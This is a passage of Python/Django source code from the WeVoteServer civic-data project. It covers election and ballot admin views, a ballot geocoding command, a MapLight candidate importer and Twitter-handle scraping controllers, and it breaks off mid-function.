def election_all_ballots_retrieve_view(request, election_local_id=0):
"""
Reach out to Google and retrieve (for one election):
1) Polling locations (so we can use those addresses to retrieve a representative set of ballots)
    2) Cycle through those polling locations, so we end up caching all of the possible ballot items
:param request:
:return:
"""
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
try:
if positive_value_exists(election_local_id):
election_on_stage = Election.objects.get(id=election_local_id)
else:
election_on_stage = Election.objects.get(google_civic_election_id=google_civic_election_id)
election_local_id = election_on_stage.id
except Election.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
messages.add_message(request, messages.ERROR, 'Could not retrieve ballot data. More than one election found.')
return HttpResponseRedirect(reverse('election:election_list', args=()))
except Election.DoesNotExist:
messages.add_message(request, messages.ERROR, 'Could not retrieve ballot data. Election could not be found.')
return HttpResponseRedirect(reverse('election:election_list', args=()))
# Check to see if we have polling location data related to the region(s) covered by this election
# We request the ballot data for each polling location as a way to build up our local data
state = election_on_stage.get_election_state()
try:
polling_location_count_query = PollingLocation.objects.all()
polling_location_count_query = polling_location_count_query.filter(state__iexact=state)
polling_location_count = polling_location_count_query.count()
polling_location_list = PollingLocation.objects.all()
polling_location_list = polling_location_list.filter(state__iexact=state)
# We used to have a limit of 500 ballots to pull per election, but now retrieve all
# Ordering by "location_name" creates a bit of (locational) random order
polling_location_list = polling_location_list.order_by('location_name') # [:500]
except PollingLocation.DoesNotExist:
messages.add_message(request, messages.INFO,
'Could not retrieve ballot data for the {election_name}. '
'No polling locations exist for the state \'{state}\'. '
'Data needed from VIP.'.format(
election_name=election_on_stage.election_name,
state=state))
return HttpResponseRedirect(reverse('election:election_summary', args=(election_local_id,)))
if polling_location_count == 0:
messages.add_message(request, messages.ERROR,
'Could not retrieve ballot data for the {election_name}. '
'No polling locations returned for the state \'{state}\'. (error 2)'.format(
election_name=election_on_stage.election_name,
state=state))
return HttpResponseRedirect(reverse('election:election_summary', args=(election_local_id,)))
ballots_retrieved = 0
ballots_not_retrieved = 0
ballots_with_contests_retrieved = 0
# We used to only retrieve up to 500 locations from each state, but we don't limit now
# # We retrieve 10% of the total polling locations, which should give us coverage of the entire election
# number_of_polling_locations_to_retrieve = int(.1 * polling_location_count)
for polling_location in polling_location_list:
success = False
# Get the address for this polling place, and then retrieve the ballot from Google Civic API
text_for_map_search = polling_location.get_text_for_map_search()
one_ballot_results = retrieve_one_ballot_from_google_civic_api(
text_for_map_search, election_on_stage.google_civic_election_id)
if one_ballot_results['success']:
one_ballot_json = one_ballot_results['structured_json']
store_one_ballot_results = store_one_ballot_from_google_civic_api(one_ballot_json, 0,
polling_location.we_vote_id)
if store_one_ballot_results['success']:
success = True
if success:
ballots_retrieved += 1
else:
ballots_not_retrieved += 1
if one_ballot_results['contests_retrieved']:
ballots_with_contests_retrieved += 1
# We used to only retrieve up to 500 locations from each state, but we don't limit now
# # Break out of this loop, assuming we have a minimum number of ballots with contests retrieved
# # If we don't achieve the minimum number of ballots_with_contests_retrieved, break out at the emergency level
# emergency = (ballots_retrieved + ballots_not_retrieved) >= (3 * number_of_polling_locations_to_retrieve)
# if ((ballots_retrieved + ballots_not_retrieved) >= number_of_polling_locations_to_retrieve and
# ballots_with_contests_retrieved > 20) or emergency:
# break
if ballots_retrieved > 0:
total_retrieved = ballots_retrieved + ballots_not_retrieved
messages.add_message(request, messages.INFO,
'Ballot data retrieved from Google Civic for the {election_name}. '
'(ballots retrieved: {ballots_retrieved} '
'(with contests: {ballots_with_contests_retrieved}), '
'not retrieved: {ballots_not_retrieved}, '
'total: {total})'.format(
ballots_retrieved=ballots_retrieved,
ballots_not_retrieved=ballots_not_retrieved,
ballots_with_contests_retrieved=ballots_with_contests_retrieved,
election_name=election_on_stage.election_name,
total=total_retrieved))
else:
messages.add_message(request, messages.ERROR,
'Ballot data NOT retrieved from Google Civic for the {election_name}.'
' (not retrieved: {ballots_not_retrieved})'.format(
ballots_not_retrieved=ballots_not_retrieved,
election_name=election_on_stage.election_name))
return HttpResponseRedirect(reverse('election:election_summary', args=(election_local_id,)))
@login_required
def election_edit_view(request, election_local_id):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
election_local_id = convert_to_int(election_local_id)
election_on_stage_found = False
election_on_stage = Election()
if positive_value_exists(election_local_id):
try:
election_on_stage = Election.objects.get(id=election_local_id)
election_on_stage_found = True
except Election.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except Election.DoesNotExist:
# This is fine, create new
pass
else:
        # If here, we are creating a new election
pass
if election_on_stage_found:
template_values = {
'messages_on_stage': messages_on_stage,
'election': election_on_stage,
}
else:
template_values = {
'messages_on_stage': messages_on_stage,
}
return render(request, "election/election_edit.html", template_values)
@login_required()
def election_edit_process_view(request):
"""
Process the new or edit election forms
:param request:
:return:
"""
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
election_local_id = convert_to_int(request.POST.get('election_local_id', 0))
election_name = request.POST.get('election_name', False)
election_day_text = request.POST.get('election_day_text', False)
state_code = request.POST.get('state_code', False)
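    # The default of False (rather than '') lets the "is not False" checks below distinguish a field
    # that was not submitted at all from a field submitted empty, so unsubmitted fields are left untouched.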
election_on_stage = Election()
election_changed = False
# Check to see if this election is already being used anywhere
election_on_stage_found = False
try:
election_query = Election.objects.filter(id=election_local_id)
if len(election_query):
election_on_stage = election_query[0]
election_on_stage_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
try:
if election_on_stage_found:
if convert_to_int(election_on_stage.google_civic_election_id) < 1000000:
# If here, this is an election created by Google Civic and we limit what fields to update
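                # (Assumed convention: fetch_next_we_vote_election_id_integer, used for new We Vote
                # elections below, hands out ids of 1000000 and up, so smaller ids came from Google Civic.)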
# Update
if state_code is not False:
election_on_stage.state_code = state_code
election_changed = True
if election_changed:
election_on_stage.save()
messages.add_message(request, messages.INFO, 'Google Civic-created election updated.')
else:
# If here, this is a We Vote created election
# Update
if election_name is not False:
election_on_stage.election_name = election_name
election_changed = True
if election_day_text is not False:
election_on_stage.election_day_text = election_day_text
election_changed = True
if state_code is not False:
election_on_stage.state_code = state_code
election_changed = True
if election_changed:
election_on_stage.save()
messages.add_message(request, messages.INFO, 'We Vote-created election updated.')
else:
# Create new
next_local_election_id_integer = fetch_next_we_vote_election_id_integer()
election_on_stage = Election(
google_civic_election_id=next_local_election_id_integer,
election_name=election_name,
election_day_text=election_day_text,
state_code=state_code,
)
election_on_stage.save()
messages.add_message(request, messages.INFO, 'New election saved.')
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
messages.add_message(request, messages.ERROR, 'Could not save election.')
return HttpResponseRedirect(reverse('election:election_list', args=()))
@login_required()
def election_list_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
election_list_query = Election.objects.all()
election_list_query = election_list_query.order_by('election_day_text').reverse()
election_list = election_list_query
template_values = {
'messages_on_stage': messages_on_stage,
'election_list': election_list,
}
return render(request, 'election/election_list.html', template_values)
@login_required()
def election_remote_retrieve_view(request):
"""
Reach out to Google and retrieve the latest list of available elections
:param request:
:return:
"""
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
results = election_remote_retrieve()
if not results['success']:
messages.add_message(request, messages.INFO, results['status'])
else:
messages.add_message(request, messages.INFO, 'Upcoming elections retrieved from Google Civic.')
return HttpResponseRedirect(reverse('election:election_list', args=()))
@login_required()
def election_summary_view(request, election_local_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
election_local_id = convert_to_int(election_local_id)
election_on_stage_found = False
election_on_stage = Election()
try:
election_on_stage = Election.objects.get(id=election_local_id)
election_on_stage_found = True
except Election.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except Election.DoesNotExist:
# This is fine, proceed anyways
pass
if election_on_stage_found:
ballot_returned_list_manager = BallotReturnedListManager()
ballot_returned_list_results = ballot_returned_list_manager.retrieve_ballot_returned_list_for_election(
election_on_stage.google_civic_election_id)
if ballot_returned_list_results['success']:
ballot_returned_list = ballot_returned_list_results['ballot_returned_list']
else:
ballot_returned_list = []
template_values = {
'messages_on_stage': messages_on_stage,
'election': election_on_stage,
'ballot_returned_list': ballot_returned_list,
}
else:
template_values = {
'messages_on_stage': messages_on_stage,
}
return render(request, 'election/election_summary.html', template_values)
# TODO Which of these two do we standardize on?
class ElectionsSyncOutView(APIView):
"""
    Export raw election data to JSON format
"""
def get(self, request): # Removed: , format=None
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
results = elections_sync_out_list_for_api(voter_device_id)
        if 'success' not in results or not results['success']:
            json_data = results['json_data']
            return HttpResponse(json.dumps(json_data), content_type='application/json')
else:
election_list = results['election_list']
serializer = ElectionSerializer(election_list, many=True)
return Response(serializer.data)
# This page does not need to be protected.
class ExportElectionDataView(APIView):
def get(self, request, format=None):
election_list = Election.objects.all()
serializer = ElectionSerializer(election_list, many=True)
return Response(serializer.data)
@login_required
def elections_import_from_master_server_view(request):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
state_code = request.GET.get('state_code', '')
results = elections_import_from_master_server()
if not results['success']:
messages.add_message(request, messages.ERROR, results['status'])
else:
messages.add_message(request, messages.INFO, 'Elections import completed. '
'Saved: {saved}, Updated: {updated}, '
'Not processed: {not_processed}'
''.format(saved=results['saved'],
updated=results['updated'],
not_processed=results['not_processed']))
return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + "?google_civic_election_id=" +
str(google_civic_election_id) + "&state_code=" + str(state_code))
@login_required()
def election_migration_view(request):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
election_manager = ElectionManager()
we_vote_election = Election()
office_list_manager = ContestOfficeListManager()
candidate_list_manager = CandidateCampaignListManager()
position_list_manager = PositionListManager()
we_vote_election_office_list = []
google_civic_election_office_list = []
results = election_manager.retrieve_we_vote_elections()
we_vote_election_list = results['election_list']
state_code_list = []
for election in we_vote_election_list:
if election.state_code not in state_code_list:
state_code_list.append(election.state_code)
google_civic_election = Election()
results = election_manager.retrieve_google_civic_elections_in_state_list(state_code_list)
google_civic_election_list = results['election_list']
we_vote_election_id = convert_to_int(request.GET.get('we_vote_election_id', 0))
if not positive_value_exists(we_vote_election_id):
we_vote_election_id = convert_to_int(request.POST.get('we_vote_election_id', 0))
if positive_value_exists(we_vote_election_id):
results = election_manager.retrieve_election(we_vote_election_id)
if results['election_found']:
we_vote_election = results['election']
return_list_of_objects = True
results = office_list_manager.retrieve_all_offices_for_upcoming_election(we_vote_election_id,
return_list_of_objects)
if results['office_list_found']:
we_vote_election_office_list = results['office_list_objects']
# Go through each office and attach a list of candidates under this office
we_vote_election_office_list_new = []
for one_office in we_vote_election_office_list:
candidate_results = candidate_list_manager.retrieve_all_candidates_for_office(0, one_office.we_vote_id)
if candidate_results['candidate_list_found']:
candidate_list = candidate_results['candidate_list']
new_candidate_list = []
# Go through candidate_list and find the number of positions saved for each candidate
for candidate in candidate_list:
retrieve_public_positions = True # The alternate is positions for friends-only
position_list = position_list_manager.retrieve_all_positions_for_candidate_campaign(
retrieve_public_positions, 0, candidate.we_vote_id)
candidate.position_count = len(position_list) # This is wasteful (instead of using count), but ok
# Now find the candidates from the Google Civic Election that we might want to transfer data to
new_candidate_list.append(candidate)
one_office.candidate_list = new_candidate_list
else:
one_office.candidate_list = []
we_vote_election_office_list_new.append(one_office)
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
if not positive_value_exists(google_civic_election_id):
google_civic_election_id = convert_to_int(request.POST.get('google_civic_election_id', 0))
if positive_value_exists(google_civic_election_id):
results = election_manager.retrieve_election(google_civic_election_id)
if results['election_found']:
google_civic_election = results['election']
return_list_of_objects = True
results = office_list_manager.retrieve_all_offices_for_upcoming_election(google_civic_election_id,
return_list_of_objects)
if results['office_list_found']:
google_civic_election_office_list = results['office_list_objects']
    # We want to transfer data from the We Vote election's offices over to the matching Google Civic offices
transfer_array = {}
transfer_array['wv01off1461'] = "wv02off269"
template_values = {
'messages_on_stage': messages_on_stage,
'we_vote_election': we_vote_election,
'we_vote_election_id': we_vote_election_id,
'we_vote_election_list': we_vote_election_list,
'we_vote_election_office_list': we_vote_election_office_list_new,
'google_civic_election': google_civic_election,
'google_civic_election_id': google_civic_election_id,
'google_civic_election_list': google_civic_election_list,
'google_civic_election_office_list': google_civic_election_office_list,
}
return render(request, 'election/election_migration.html', template_values)
```
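Helpers called from these views, such as retrieve_one_ballot_from_google_civic_api and store_one_ballot_from_google_civic_api, share a convention: each returns a plain dict carrying at least 'success' and 'status' keys, and the caller branches on 'success'. A minimal sketch of that convention with a hypothetical helper (retrieve_widget and its payload key are illustrative only):
```python
def retrieve_widget(widget_id):
    # Hypothetical helper showing the results-dict convention used throughout these views
    try:
        widget = {'id': widget_id}  # stand-in for a real database lookup
        return {'success': True, 'status': 'WIDGET_RETRIEVED', 'widget': widget}
    except Exception as e:
        return {'success': False, 'status': 'WIDGET_RETRIEVE_FAILED: {error}'.format(error=e)}

results = retrieve_widget(42)
if results['success']:
    print(results['widget'])
else:
    print(results['status'])
```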
#### File: management/commands/save_ballot_coordinates.py
```python
from django.core.management.base import BaseCommand
from geopy.geocoders import get_geocoder_for_service
from geopy.exc import GeocoderQuotaExceeded
from ballot.models import BallotReturned
class Command(BaseCommand):
help = 'Populates the latitude and longitude fields of BallotReturned'
def populate_latitude_for_ballots(self):
for b in BallotReturned.objects.filter(latitude=None).order_by('id'):
full_ballot_address = '{}, {}, {} {}'.format(
b.normalized_line1, b.normalized_city, b.normalized_state, b.normalized_zip)
location = self.google_client.geocode(full_ballot_address)
if location is None:
raise Exception('Could not find a location for ballot {}'.format(b.id))
b.latitude, b.longitude = location.latitude, location.longitude
print('ballot {}, found latitude {}, longitude {}'.format(b.id, b.latitude, b.longitude))
b.save()
def handle(self, *args, **options):
self.google_client = get_geocoder_for_service('google')()
while BallotReturned.objects.filter(latitude=None).exists():
try:
self.populate_latitude_for_ballots()
except GeocoderQuotaExceeded:
self.google_client = get_geocoder_for_service('google')()
print('Success! All BallotReturned objects now have latitude and longitude populated.')
```
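The command above is normally run from the shell as `python manage.py save_ballot_coordinates`, but it can also be invoked programmatically. A minimal sketch using Django's standard call_command (assumes DJANGO_SETTINGS_MODULE is already configured):
```python
# Sketch only: programmatic invocation of the management command above.
import django
django.setup()  # requires DJANGO_SETTINGS_MODULE to be set

from django.core.management import call_command

call_command('save_ballot_coordinates')
```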
#### File: WeVoteServer/import_export_maplight/controllers.py
```python
from .models import MapLightContestOfficeManager, MapLightCandidateManager, MapLightContestOffice, \
MapLightCandidate, validate_maplight_date
from exception.models import handle_record_not_saved_exception
import json
import wevote_functions.admin
logger = wevote_functions.admin.get_logger(__name__)
MAPLIGHT_SAMPLE_BALLOT_JSON_FILE = "import_export_maplight/import_data/maplight_sf_ballot_sample.json"
MAPLIGHT_SAMPLE_CONTEST_JSON_FILE = "import_export_maplight/import_data/contest_{contest_id}.json"
def import_maplight_from_json(request):
load_from_url = False
ballot_for_one_voter_array = []
if load_from_url:
# Request json file from Maplight servers
logger.debug("TO BE IMPLEMENTED: Load Maplight JSON from url")
# request = requests.get(VOTER_INFO_URL, params={
# "key": GOOGLE_CIVIC_API_KEY, # This comes from an environment variable
# "address": "254 Hartford Street San Francisco CA",
# "electionId": "2000",
# })
# structured_json = json.loads(request.text)
else:
# Load saved json from local file
logger.debug("Loading Maplight sample JSON from local file")
with open(MAPLIGHT_SAMPLE_BALLOT_JSON_FILE) as ballot_for_one_voter_json:
ballot_for_one_voter_array = json.load(ballot_for_one_voter_json)
# A MapLight ballot query is essentially an array of contests with the key as the contest_id
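    # Illustrative shape only, inferred from the parsing below (not from MapLight documentation):
    #   {"307": {"type": "office", "office": {...}},
    #    "308": {"type": "measure", ...}}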
if ballot_for_one_voter_array and len(ballot_for_one_voter_array):
# Parse the JSON here. This JSON is a list of contests on the ballot for one voter.
for contest_id in ballot_for_one_voter_array:
# Get a description of the contest. Office? Measure?
contest_overview_array = ballot_for_one_voter_array[contest_id]
if contest_overview_array['type'] == "office":
# Get a description of the office the candidates are competing for
# contest_office_description_json = contest_overview_array['office']
# With the contest_id, we can look up who is running
politicians_running_for_one_contest_array = []
if load_from_url:
logger.debug("TO BE IMPLEMENTED: Load MapLight JSON for a contest from URL")
else:
json_file_with_the_data_from_this_contest = MAPLIGHT_SAMPLE_CONTEST_JSON_FILE.format(
contest_id=contest_id)
try:
with open(json_file_with_the_data_from_this_contest) as json_data:
politicians_running_for_one_contest_array = json.load(json_data)
                    except Exception as e:
                        logger.error("Could not load {file_path}: {error}".format(
                            file_path=json_file_with_the_data_from_this_contest,
                            error=e))
# Don't try to process the file if it doesn't exist, but go to the next entry
continue
import_maplight_contest_office_candidates_from_array(politicians_running_for_one_contest_array)
# Also add measure
return
def import_maplight_contest_office_candidates_from_array(politicians_running_for_one_contest_array):
maplight_contest_office_saved = False # Has the contest these politicians are running for been saved?
maplight_contest_office_manager = MapLightContestOfficeManager()
maplight_candidate_manager = MapLightCandidateManager()
loop_count = 0
loop_count_limit = 1
for politician_id in politicians_running_for_one_contest_array:
one_politician_array = politicians_running_for_one_contest_array[politician_id]
# Save the office_contest so we can link the politicians to it first
if not maplight_contest_office_saved:
maplight_contest_office = MapLightContestOffice()
if 'contest' in one_politician_array:
maplight_contest_array = one_politician_array['contest']
if 'office' in maplight_contest_array:
maplight_contest_office_array = maplight_contest_array['office']
if 'id' in maplight_contest_array:
maplight_contest_id = maplight_contest_array['id']
maplight_contest_office = \
maplight_contest_office_manager.fetch_maplight_contest_office_from_id_maplight(
maplight_contest_id)
# If an internal identifier is found, then we know we have an object
if maplight_contest_office.id:
maplight_contest_office_saved = True
# try:
# maplight_contest_office.contest_id = maplight_contest_array['id']
# maplight_contest_office.election_date = maplight_contest_array['election_date']
# maplight_contest_office.title = maplight_contest_array['title']
# maplight_contest_office.type = maplight_contest_array['type']
# maplight_contest_office.url = maplight_contest_array['url']
# # Save into this db the 'office'?
# # Save into this db the 'jurisdiction'?
# maplight_contest_office.save()
# maplight_contest_office_saved = True
#
# except Exception as e:
# handle_record_not_saved_exception(e)
else:
try:
maplight_contest_office = MapLightContestOffice(
contest_id=maplight_contest_array['id'],
election_date=maplight_contest_array['election_date'],
title=maplight_contest_array['title'],
type=maplight_contest_array['type'],
url=maplight_contest_array['url'],
)
# Save into this db the 'office'?
# Save into this db the 'jurisdiction'?
maplight_contest_office.save()
maplight_contest_office_saved = True
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
maplight_candidate = maplight_candidate_manager.fetch_maplight_candidate_from_candidate_id_maplight(
one_politician_array['candidate_id'])
if maplight_candidate.id:
            logger.warning(u"Candidate {display_name} previously saved".format(
display_name=maplight_candidate.display_name
))
else:
# Not found in the MapLightCandidate database, so we need to save
try:
maplight_candidate = MapLightCandidate()
maplight_candidate.politician_id = one_politician_array['politician_id']
maplight_candidate.candidate_id = one_politician_array['candidate_id']
maplight_candidate.display_name = one_politician_array['display_name']
maplight_candidate.original_name = one_politician_array['original_name']
maplight_candidate.gender = one_politician_array['gender']
maplight_candidate.first_name = one_politician_array['first_name']
maplight_candidate.middle_name = one_politician_array['middle_name']
maplight_candidate.last_name = one_politician_array['last_name']
maplight_candidate.name_prefix = one_politician_array['name_prefix']
maplight_candidate.name_suffix = one_politician_array['name_suffix']
maplight_candidate.bio = one_politician_array['bio']
maplight_candidate.party = one_politician_array['party']
maplight_candidate.candidate_flags = one_politician_array['candidate_flags']
if validate_maplight_date(one_politician_array['last_funding_update']):
maplight_candidate.last_funding_update = one_politician_array['last_funding_update']
maplight_candidate.roster_name = one_politician_array['roster_name']
maplight_candidate.photo = one_politician_array['photo']
maplight_candidate.url = one_politician_array['url']
maplight_candidate.save()
logger.info(u"Candidate {display_name} added".format(
display_name=maplight_candidate.display_name
))
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
# TODO: Now link the candidate to the contest
```
#### File: WeVoteServer/import_export_twitter/controllers.py
```python
from .functions import retrieve_twitter_user_info
from candidate.models import CandidateCampaignManager, CandidateCampaignListManager
from config.base import get_environment_variable
from organization.controllers import update_social_media_statistics_in_other_tables
from organization.models import Organization, OrganizationManager
import re
from socket import timeout
import tweepy
import urllib.request
from voter.models import VoterDeviceLinkManager, VoterManager
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, extract_twitter_handle_from_text_string, \
is_voter_device_id_valid, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
WE_VOTE_SERVER_ROOT_URL = get_environment_variable("WE_VOTE_SERVER_ROOT_URL")
RE_FACEBOOK = r'//www\.facebook\.com/(?:#!/)?(\w+)'
# RE_FACEBOOK = r'/(?:https?:\/\/)?(?:www\.)?facebook\.com\/(?:(?:\w)*#!\/)?(?:pages\/)?(?:[\w\-]*\/)*?(\/)?([^/?]*)/'
FACEBOOK_BLACKLIST = ['group', 'group.php', 'None']
# NOTE: Scraping a website for the Facebook handle is more complicated than Twitter. There must be an existing
# solution available? My attempt is turned off for now.
# Only pays attention to https://twitter.com or http://twitter.com and ignores www.twitter.com
RE_TWITTER = r'//twitter\.com/(?:#!/)?(\w+)'
TWITTER_BLACKLIST = ['home', 'https', 'intent', 'none', 'search', 'share', 'twitterapi']
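# Example matches for RE_TWITTER (group 1 is the handle):
#   'https://twitter.com/WeVote'    -> 'WeVote'
#   'http://twitter.com/#!/WeVote'  -> 'WeVote'
#   'https://www.twitter.com/WeVote' is ignored, per the note above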
TWITTER_CONSUMER_KEY = get_environment_variable("TWITTER_CONSUMER_KEY")
TWITTER_CONSUMER_SECRET = get_environment_variable("TWITTER_CONSUMER_SECRET")
TWITTER_ACCESS_TOKEN = get_environment_variable("TWITTER_ACCESS_TOKEN")
TWITTER_ACCESS_TOKEN_SECRET = get_environment_variable("TWITTER_ACCESS_TOKEN_SECRET")
class FakeFirefoxURLopener(urllib.request.FancyURLopener):
version = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0)' \
+ ' Gecko/20100101 Firefox/25.0'
class GetOutOfLoop(Exception):
pass
class GetOutOfLoopLocal(Exception):
pass
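# These two exception classes exist purely for flow control in scrape_social_media_from_one_site below:
# GetOutOfLoopLocal breaks out of the regex scan for a single line, while GetOutOfLoop aborts the
# whole page scan once a handle has been found.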
def refresh_twitter_candidate_details(candidate_campaign):
candidate_campaign_manager = CandidateCampaignManager()
if not candidate_campaign:
status = "TWITTER_CANDIDATE_DETAILS_NOT_RETRIEVED-CANDIDATE_MISSING"
results = {
'success': False,
'status': status,
}
return results
if candidate_campaign.candidate_twitter_handle:
status = "TWITTER_CANDIDATE_DETAILS-REACHING_OUT_TO_TWITTER"
results = retrieve_twitter_user_info(candidate_campaign.candidate_twitter_handle)
if results['success']:
status = "TWITTER_CANDIDATE_DETAILS_RETRIEVED_FROM_TWITTER"
save_results = candidate_campaign_manager.update_candidate_twitter_details(
candidate_campaign, results['twitter_json'])
else:
status = "TWITTER_CANDIDATE_DETAILS-CLEARING_DETAILS"
save_results = candidate_campaign_manager.clear_candidate_twitter_details(candidate_campaign)
results = {
'success': True,
'status': status,
}
return results
def refresh_twitter_organization_details(organization):
organization_manager = OrganizationManager()
if not organization:
status = "ORGANIZATION_TWITTER_DETAILS_NOT_RETRIEVED-ORG_MISSING"
results = {
'success': False,
'status': status,
}
return results
if organization.organization_twitter_handle:
status = "ORGANIZATION_TWITTER_DETAILS-REACHING_OUT_TO_TWITTER"
results = retrieve_twitter_user_info(organization.organization_twitter_handle)
if results['success']:
status = "ORGANIZATION_TWITTER_DETAILS_RETRIEVED_FROM_TWITTER"
save_results = organization_manager.update_organization_twitter_details(
organization, results['twitter_json'])
if save_results['success']:
results = update_social_media_statistics_in_other_tables(organization)
status = "ORGANIZATION_TWITTER_DETAILS_RETRIEVED_FROM_TWITTER_AND_SAVED"
else:
status = "ORGANIZATION_TWITTER_DETAILS-CLEARING_DETAILS"
save_results = organization_manager.clear_organization_twitter_details(organization)
if save_results['success']:
results = update_social_media_statistics_in_other_tables(organization)
status = "ORGANIZATION_TWITTER_DETAILS_CLEARED_FROM_DB"
results = {
'success': True,
'status': status,
}
return results
def scrape_social_media_from_one_site(site_url):
twitter_handle = ''
twitter_handle_found = False
facebook_page = ''
facebook_page_found = False
success = False
if len(site_url) < 10:
status = 'PROPER_URL_NOT_PROVIDED: ' + site_url
results = {
'status': status,
'success': success,
'twitter_handle': twitter_handle,
'twitter_handle_found': twitter_handle_found,
'facebook_page': facebook_page,
'facebook_page_found': facebook_page_found,
}
return results
    urllib._urlopener = FakeFirefoxURLopener()  # NOTE: urllib.request.urlopen does not consult this in Python 3; the headers passed to Request below set the user agent
headers = {
'User-Agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
}
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Encoding': 'none',
# 'Accept-Language': 'en-US,en;q=0.8',
# 'Connection': 'keep-alive'
# 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
try:
request = urllib.request.Request(site_url, None, headers)
page = urllib.request.urlopen(request, timeout=5)
for line in page.readlines():
try:
if not twitter_handle_found:
for m in re.finditer(RE_TWITTER, line.decode()):
if m:
name = m.group(1)
if name not in TWITTER_BLACKLIST:
twitter_handle = name
twitter_handle_found = True
raise GetOutOfLoopLocal
except GetOutOfLoopLocal:
pass
# SEE NOTE ABOUT FACEBOOK SCRAPING ABOVE
# try:
# if not facebook_page_found:
# for m2 in re.finditer(RE_FACEBOOK, line.decode()):
# if m2:
# possible_page1 = m2.group(1)
# if possible_page1 not in FACEBOOK_BLACKLIST:
# facebook_page = possible_page1
# facebook_page_found = True
# raise GetOutOfLoopLocal
# try:
# possible_page2 = m2.group(2)
# if possible_page2 not in FACEBOOK_BLACKLIST:
# facebook_page = possible_page2
# facebook_page_found = True
# raise GetOutOfLoopLocal
# # ATTEMPT 1
# # start_of_close_tag_index = possible_page2.find('"')
# # possible_page2 = possible_page2[:start_of_close_tag_index]
# # ATTEMPT 2
# # fb_re = re.compile(r'facebook.com([^"]+)')
# # results = fb_re.findall(possible_page2)
# except Exception as error_instance:
# pass
# # possible_page3 = m2.group(3)
# # possible_page4 = m2.group(4)
# except GetOutOfLoopLocal:
# pass
if twitter_handle_found: # and facebook_page_found:
raise GetOutOfLoop
success = True
status = 'FINISHED_SCRAPING_PAGE'
except timeout:
status = "SCRAPE_TIMEOUT_ERROR"
success = False
except GetOutOfLoop:
success = True
status = 'TWITTER_HANDLE_FOUND-BREAK_OUT'
except IOError as error_instance:
# Catch the error message coming back from urllib.request.urlopen and pass it in the status
error_message = error_instance
status = "SCRAPE_SOCIAL_IO_ERROR: {error_message}".format(error_message=error_message)
success = False
except Exception as error_instance:
error_message = error_instance
status = "SCRAPE_GENERAL_EXCEPTION_ERROR: {error_message}".format(error_message=error_message)
success = False
results = {
'status': status,
'success': success,
'page_redirected': twitter_handle,
'twitter_handle': twitter_handle,
'twitter_handle_found': twitter_handle_found,
'facebook_page': facebook_page,
'facebook_page_found': facebook_page_found,
}
return results
def scrape_and_save_social_media_from_all_organizations(state_code='', force_retrieve=False):
facebook_pages_found = 0
twitter_handles_found = 0
organization_manager = OrganizationManager()
organization_list_query = Organization.objects.order_by('organization_name')
if positive_value_exists(state_code):
organization_list_query = organization_list_query.filter(state_served_code=state_code)
organization_list = organization_list_query
for organization in organization_list:
twitter_handle = False
facebook_page = False
if not organization.organization_website:
continue
if (not positive_value_exists(organization.organization_twitter_handle)) or force_retrieve:
scrape_results = scrape_social_media_from_one_site(organization.organization_website)
# Only include a change if we have a new value (do not try to save blank value)
if scrape_results['twitter_handle_found'] and positive_value_exists(scrape_results['twitter_handle']):
twitter_handle = scrape_results['twitter_handle']
twitter_handles_found += 1
if scrape_results['facebook_page_found'] and positive_value_exists(scrape_results['facebook_page']):
facebook_page = scrape_results['facebook_page']
facebook_pages_found += 1
save_results = organization_manager.update_organization_social_media(organization, twitter_handle,
facebook_page)
# ######################################
# We refresh the Twitter information in another function
status = "ORGANIZATION_SOCIAL_MEDIA_SCRAPED"
results = {
'success': True,
'status': status,
'twitter_handles_found': twitter_handles_found,
'facebook_pages_found': facebook_pages_found,
}
return results
def retrieve_twitter_data_for_all_organizations(state_code='', google_civic_election_id=0, first_retrieve_only=False):
number_of_twitter_accounts_queried = 0
number_of_organizations_updated = 0
organization_manager = OrganizationManager()
organization_list_query = Organization.objects.order_by('organization_name')
if positive_value_exists(state_code):
organization_list_query = organization_list_query.filter(state_served_code=state_code)
# TODO DALE limit this to organizations that have a voter guide in a particular election
organization_list = organization_list_query
for organization in organization_list:
# ######################################
# If we have a Twitter handle for this org, refresh the data
if organization.organization_twitter_handle:
retrieved_twitter_data = False
if first_retrieve_only:
if not positive_value_exists(organization.twitter_followers_count):
results = retrieve_twitter_user_info(organization.organization_twitter_handle)
retrieved_twitter_data = results['success']
number_of_twitter_accounts_queried += 1
else:
